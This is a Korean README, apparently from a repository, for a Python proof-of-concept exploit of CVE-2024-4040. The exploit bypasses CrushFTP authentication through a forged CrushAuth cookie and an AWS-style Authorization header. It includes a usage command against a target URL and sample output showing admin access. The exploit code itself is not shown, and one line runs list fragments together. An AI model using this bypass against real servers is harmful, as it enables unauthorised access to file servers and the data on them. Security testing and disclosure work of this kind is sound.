
CVE-2024-4040 익스플로잇 – CrushAuth 쿠키 및 AWS 스타일 헤더 스푸핑을 통한 CrushFTP 인증 우회. 보안 토큰 생성, SSL 우회 및 개선된 출력을 지원하는 스텔스 Python PoC.
이 저장소는 CVE-2024-4040에 대한 은밀한 Python 개념 증명(PoC) 익스플로잇을 포함합니다. 이는 CrushFTP(v10 이하)의 치명적인 취약점으로, 공격자가 조작된 CrushAuth 쿠키와 AWS 스타일의 Authorization 헤더를 사용하여 인증을 우회할 수 있게 합니다.
인증되지 않은 공격자는 특정 쿠키/헤더 조합을 제작하여 취약한 CrushFTP 인스턴스의 인증을 우회하고 내부 웹 기능에 무단 접근할 수 있습니다.
secrets를 사용한 안전한 CrushAuth 생성Authorization 헤더requests만 필요)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — CrushFTP 서버의 기본 URL
--valid_username — 알려진 유효 사용자 (기본값: crushadmin)
🔍 예제 출력
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
이 코드는 교육 및 승인된 보안 테스트 목적으로만 사용해야 합니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 사용하지 마십시오.
PoC 리팩터링: illdeed